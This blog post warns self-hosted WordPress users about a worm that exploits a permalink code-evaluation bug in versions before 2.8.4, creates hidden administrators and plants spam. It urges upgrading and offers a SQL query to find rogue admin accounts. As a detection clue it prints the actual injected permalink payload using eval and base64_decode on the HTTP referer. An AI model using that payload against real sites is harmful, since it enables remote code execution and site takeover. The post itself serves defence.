Yesterday, while I was checking on my WP Dashboard, I came across Lorelle’s post that warned WordPress users about old WordPress versions being attacked. From that post, I learned that there are reports of attacks on older versions of WordPress and that the number of sites being hit was increasing by the hour. When I tried to look for related news in the web, I found out that popular web design blog Smashing Magazine and tech evangelist Robert Scoble’s blog – Scobleizer, recently fell victim to these attacks.
At first I thought that it was the same kind of attack that was recently done on my blog, 2-3 days ago. If you follow me on Twitter or Facebook, you might have come across my status updates about an attack on my blog using the wp-pass redirect vulnerability which is a securitly flaw found in older versions of WordPress.
Later that day, Matt Mullenweg published a post on the WordPress Dev Blog entitled – How To Keep WordPress Secure> There I learned that these recent attacks were different and were caused by a smart and malicious computer worm.
Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.
The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.
I’m sure alot of WordPress blogs are still under attack even as we speak but those who are at risk are those self-hosted WordPress blogs that are running older versions of WordPress (versions prior to 2.8.4). WordPress.com blogs are not at risk because they are always kept up-to-date. In this case, hiding your WordPress version is not enough and the only way to keep your blog safe from this type of attack is to always update to the latest version available.
How do you know if your blog was already attacked?
Lorelle shares two clues to look for and check if your blog has been attacked.
1. There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
2. A “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. If you can’t access that account, check out Journey Etc’s solution.
If you have confirmed that your blog has been attacked, the WordPress Dev team has setup a My Site Was Hacked page to help you out.
If you have access to your MySQL database and want to make sure that there are no extra administrator accounts registered on your blog, copy and paste the following code or SQL query and run it against your WordPress database.
[sql]
SELECT u.ID, u.user_login
FROM wp_users u, wp_usermeta um
WHERE u.ID = um.user_id
AND um.meta_key = ‘kPaqAwJE_capabilities’
AND um.meta_value LIKE ‘%administrator%’;
[/sql]
[via Dougal Campbell]
Here in JaypeeOnline, I always encourage and preach to everyone to always keep your WordPress install up-to-date. Whenever there’s a new version of WordPress released, I publish it here so more users would be aware of it. I always say, “better safe than sorry” and “prevention is better than cure”. I like Matt’s analogy:
Upgrading is taking your vitamins; fixing a hack is open heart surgery.
Its unfortunate that some users wait until their blogs get compromised or wait for something like this to happen before they upgrade WordPress. Save yourself the hassle, problems and headache and always keep your WordPress blogs up-to-date! It also helps if you do regular backups of your WordPress database and your local files. If you finished reading this post and still haven’t upgraded your WordPress install, what are you waiting for? UPGRADE IT NOW!!!
Anyone else had their blog victimized by these recent attacks? If so, what did you do to fix it? If not, what preventive measures did you take to keep your WordPress-powered blogs secure?
18 Comments